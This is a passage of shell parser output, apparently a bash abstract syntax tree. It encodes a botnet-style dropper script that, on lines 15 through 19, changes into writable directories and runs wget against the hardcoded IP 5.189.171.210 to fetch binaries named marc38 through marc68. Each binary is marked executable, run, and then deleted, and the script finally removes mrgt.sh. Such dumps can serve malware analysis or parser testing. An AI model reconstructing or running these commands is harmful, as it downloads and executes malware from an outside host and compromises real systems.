  ]),
  OperatorNode(lineno=15, op='||', pos=(1741, 1743)),
  CommandNode(lineno=15, pos=(1744, 1751), parts=[
    WordNode(lineno=15, pos=(1744, 1746), word='cd'),
    WordNode(lineno=15, pos=(1747, 1751), word='/mnt'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1752, 1754)),
  CommandNode(lineno=15, pos=(1755, 1763), parts=[
    WordNode(lineno=15, pos=(1755, 1757), word='cd'),
    WordNode(lineno=15, pos=(1758, 1763), word='/root'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1764, 1766)),
  CommandNode(lineno=15, pos=(1767, 1771), parts=[
    WordNode(lineno=15, pos=(1767, 1769), word='cd'),
    WordNode(lineno=15, pos=(1770, 1771), word='/'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1771, 1772)),
  CommandNode(lineno=15, pos=(1773, 1805), parts=[
    WordNode(lineno=15, pos=(1773, 1777), word='wget'),
    WordNode(lineno=15, pos=(1778, 1805), word='http://5.189.171.210/marc38'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1805, 1806)),
  CommandNode(lineno=15, pos=(1807, 1822), parts=[
    WordNode(lineno=15, pos=(1807, 1812), word='chmod'),
    WordNode(lineno=15, pos=(1813, 1815), word='+x'),
    WordNode(lineno=15, pos=(1816, 1822), word='marc38'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1822, 1823)),
  CommandNode(lineno=15, pos=(1824, 1832), parts=[
    WordNode(lineno=15, pos=(1824, 1832), word='./marc38'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1832, 1833)),
  CommandNode(lineno=15, pos=(1834, 1847), parts=[
    WordNode(lineno=15, pos=(1834, 1836), word='rm'),
    WordNode(lineno=15, pos=(1837, 1840), word='-rf'),
    WordNode(lineno=15, pos=(1841, 1847), word='marc38'),
  ]),
])
ListNode(lineno=16, pos=(1848, 1977), parts=[
  CommandNode(lineno=16, pos=(1848, 1855), parts=[
    WordNode(lineno=16, pos=(1848, 1850), word='cd'),
    WordNode(lineno=16, pos=(1851, 1855), word='/tmp'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1856, 1858)),
  CommandNode(lineno=16, pos=(1859, 1870), parts=[
    WordNode(lineno=16, pos=(1859, 1861), word='cd'),
    WordNode(lineno=16, pos=(1862, 1870), word='/var/run'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1871, 1873)),
  CommandNode(lineno=16, pos=(1874, 1881), parts=[
    WordNode(lineno=16, pos=(1874, 1876), word='cd'),
    WordNode(lineno=16, pos=(1877, 1881), word='/mnt'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1882, 1884)),
  CommandNode(lineno=16, pos=(1885, 1893), parts=[
    WordNode(lineno=16, pos=(1885, 1887), word='cd'),
    WordNode(lineno=16, pos=(1888, 1893), word='/root'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1894, 1896)),
  CommandNode(lineno=16, pos=(1897, 1901), parts=[
    WordNode(lineno=16, pos=(1897, 1899), word='cd'),
    WordNode(lineno=16, pos=(1900, 1901), word='/'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1901, 1902)),
  CommandNode(lineno=16, pos=(1903, 1935), parts=[
    WordNode(lineno=16, pos=(1903, 1907), word='wget'),
    WordNode(lineno=16, pos=(1908, 1935), word='http://5.189.171.210/marc48'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1935, 1936)),
  CommandNode(lineno=16, pos=(1937, 1952), parts=[
    WordNode(lineno=16, pos=(1937, 1942), word='chmod'),
    WordNode(lineno=16, pos=(1943, 1945), word='+x'),
    WordNode(lineno=16, pos=(1946, 1952), word='marc48'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1952, 1953)),
  CommandNode(lineno=16, pos=(1954, 1962), parts=[
    WordNode(lineno=16, pos=(1954, 1962), word='./marc48'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1962, 1963)),
  CommandNode(lineno=16, pos=(1964, 1977), parts=[
    WordNode(lineno=16, pos=(1964, 1966), word='rm'),
    WordNode(lineno=16, pos=(1967, 1970), word='-rf'),
    WordNode(lineno=16, pos=(1971, 1977), word='marc48'),
  ]),
])
ListNode(lineno=17, pos=(1978, 2107), parts=[
  CommandNode(lineno=17, pos=(1978, 1985), parts=[
    WordNode(lineno=17, pos=(1978, 1980), word='cd'),
    WordNode(lineno=17, pos=(1981, 1985), word='/tmp'),
  ]),
  OperatorNode(lineno=17, op='||', pos=(1986, 1988)),
  CommandNode(lineno=17, pos=(1989, 2000), parts=[
    WordNode(lineno=17, pos=(1989, 1991), word='cd'),
    WordNode(lineno=17, pos=(1992, 2000), word='/var/run'),
  ]),
  OperatorNode(lineno=17, op='||', pos=(2001, 2003)),
  CommandNode(lineno=17, pos=(2004, 2011), parts=[
    WordNode(lineno=17, pos=(2004, 2006), word='cd'),
    WordNode(lineno=17, pos=(2007, 2011), word='/mnt'),
  ]),
  OperatorNode(lineno=17, op='||', pos=(2012, 2014)),
  CommandNode(lineno=17, pos=(2015, 2023), parts=[
    WordNode(lineno=17, pos=(2015, 2017), word='cd'),
    WordNode(lineno=17, pos=(2018, 2023), word='/root'),
  ]),
  OperatorNode(lineno=17, op='||', pos=(2024, 2026)),
  CommandNode(lineno=17, pos=(2027, 2031), parts=[
    WordNode(lineno=17, pos=(2027, 2029), word='cd'),
    WordNode(lineno=17, pos=(2030, 2031), word='/'),
  ]),
  OperatorNode(lineno=17, op=';', pos=(2031, 2032)),
  CommandNode(lineno=17, pos=(2033, 2065), parts=[
    WordNode(lineno=17, pos=(2033, 2037), word='wget'),
    WordNode(lineno=17, pos=(2038, 2065), word='http://5.189.171.210/marc58'),
  ]),
  OperatorNode(lineno=17, op=';', pos=(2065, 2066)),
  CommandNode(lineno=17, pos=(2067, 2082), parts=[
    WordNode(lineno=17, pos=(2067, 2072), word='chmod'),
    WordNode(lineno=17, pos=(2073, 2075), word='+x'),
    WordNode(lineno=17, pos=(2076, 2082), word='marc58'),
  ]),
  OperatorNode(lineno=17, op=';', pos=(2082, 2083)),
  CommandNode(lineno=17, pos=(2084, 2092), parts=[
    WordNode(lineno=17, pos=(2084, 2092), word='./marc58'),
  ]),
  OperatorNode(lineno=17, op=';', pos=(2092, 2093)),
  CommandNode(lineno=17, pos=(2094, 2107), parts=[
    WordNode(lineno=17, pos=(2094, 2096), word='rm'),
    WordNode(lineno=17, pos=(2097, 2100), word='-rf'),
    WordNode(lineno=17, pos=(2101, 2107), word='marc58'),
  ]),
])
ListNode(lineno=18, pos=(2108, 2237), parts=[
  CommandNode(lineno=18, pos=(2108, 2115), parts=[
    WordNode(lineno=18, pos=(2108, 2110), word='cd'),
    WordNode(lineno=18, pos=(2111, 2115), word='/tmp'),
  ]),
  OperatorNode(lineno=18, op='||', pos=(2116, 2118)),
  CommandNode(lineno=18, pos=(2119, 2130), parts=[
    WordNode(lineno=18, pos=(2119, 2121), word='cd'),
    WordNode(lineno=18, pos=(2122, 2130), word='/var/run'),
  ]),
  OperatorNode(lineno=18, op='||', pos=(2131, 2133)),
  CommandNode(lineno=18, pos=(2134, 2141), parts=[
    WordNode(lineno=18, pos=(2134, 2136), word='cd'),
    WordNode(lineno=18, pos=(2137, 2141), word='/mnt'),
  ]),
  OperatorNode(lineno=18, op='||', pos=(2142, 2144)),
  CommandNode(lineno=18, pos=(2145, 2153), parts=[
    WordNode(lineno=18, pos=(2145, 2147), word='cd'),
    WordNode(lineno=18, pos=(2148, 2153), word='/root'),
  ]),
  OperatorNode(lineno=18, op='||', pos=(2154, 2156)),
  CommandNode(lineno=18, pos=(2157, 2161), parts=[
    WordNode(lineno=18, pos=(2157, 2159), word='cd'),
    WordNode(lineno=18, pos=(2160, 2161), word='/'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(2161, 2162)),
  CommandNode(lineno=18, pos=(2163, 2195), parts=[
    WordNode(lineno=18, pos=(2163, 2167), word='wget'),
    WordNode(lineno=18, pos=(2168, 2195), word='http://5.189.171.210/marc64'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(2195, 2196)),
  CommandNode(lineno=18, pos=(2197, 2212), parts=[
    WordNode(lineno=18, pos=(2197, 2202), word='chmod'),
    WordNode(lineno=18, pos=(2203, 2205), word='+x'),
    WordNode(lineno=18, pos=(2206, 2212), word='marc64'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(2212, 2213)),
  CommandNode(lineno=18, pos=(2214, 2222), parts=[
    WordNode(lineno=18, pos=(2214, 2222), word='./marc64'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(2222, 2223)),
  CommandNode(lineno=18, pos=(2224, 2237), parts=[
    WordNode(lineno=18, pos=(2224, 2226), word='rm'),
    WordNode(lineno=18, pos=(2227, 2230), word='-rf'),
    WordNode(lineno=18, pos=(2231, 2237), word='marc64'),
  ]),
])
ListNode(lineno=19, pos=(2238, 2367), parts=[
  CommandNode(lineno=19, pos=(2238, 2245), parts=[
    WordNode(lineno=19, pos=(2238, 2240), word='cd'),
    WordNode(lineno=19, pos=(2241, 2245), word='/tmp'),
  ]),
  OperatorNode(lineno=19, op='||', pos=(2246, 2248)),
  CommandNode(lineno=19, pos=(2249, 2260), parts=[
    WordNode(lineno=19, pos=(2249, 2251), word='cd'),
    WordNode(lineno=19, pos=(2252, 2260), word='/var/run'),
  ]),
  OperatorNode(lineno=19, op='||', pos=(2261, 2263)),
  CommandNode(lineno=19, pos=(2264, 2271), parts=[
    WordNode(lineno=19, pos=(2264, 2266), word='cd'),
    WordNode(lineno=19, pos=(2267, 2271), word='/mnt'),
  ]),
  OperatorNode(lineno=19, op='||', pos=(2272, 2274)),
  CommandNode(lineno=19, pos=(2275, 2283), parts=[
    WordNode(lineno=19, pos=(2275, 2277), word='cd'),
    WordNode(lineno=19, pos=(2278, 2283), word='/root'),
  ]),
  OperatorNode(lineno=19, op='||', pos=(2284, 2286)),
  CommandNode(lineno=19, pos=(2287, 2291), parts=[
    WordNode(lineno=19, pos=(2287, 2289), word='cd'),
    WordNode(lineno=19, pos=(2290, 2291), word='/'),
  ]),
  OperatorNode(lineno=19, op=';', pos=(2291, 2292)),
  CommandNode(lineno=19, pos=(2293, 2325), parts=[
    WordNode(lineno=19, pos=(2293, 2297), word='wget'),
    WordNode(lineno=19, pos=(2298, 2325), word='http://5.189.171.210/marc68'),
  ]),
  OperatorNode(lineno=19, op=';', pos=(2325, 2326)),
  CommandNode(lineno=19, pos=(2327, 2342), parts=[
    WordNode(lineno=19, pos=(2327, 2332), word='chmod'),
    WordNode(lineno=19, pos=(2333, 2335), word='+x'),
    WordNode(lineno=19, pos=(2336, 2342), word='marc68'),
  ]),
  OperatorNode(lineno=19, op=';', pos=(2342, 2343)),
  CommandNode(lineno=19, pos=(2344, 2352), parts=[
    WordNode(lineno=19, pos=(2344, 2352), word='./marc68'),
  ]),
  OperatorNode(lineno=19, op=';', pos=(2352, 2353)),
  CommandNode(lineno=19, pos=(2354, 2367), parts=[
    WordNode(lineno=19, pos=(2354, 2356), word='rm'),
    WordNode(lineno=19, pos=(2357, 2360), word='-rf'),
    WordNode(lineno=19, pos=(2361, 2367), word='marc68'),
  ]),
])
CommandNode(lineno=21, pos=(2369, 2383), parts=[
  WordNode(lineno=21, pos=(2369, 2371), word='rm'),
  WordNode(lineno=21, pos=(2372, 2375), word='-rf'),
  WordNode(lineno=21, pos=(2376, 2383), word='mrgt.sh'),
])
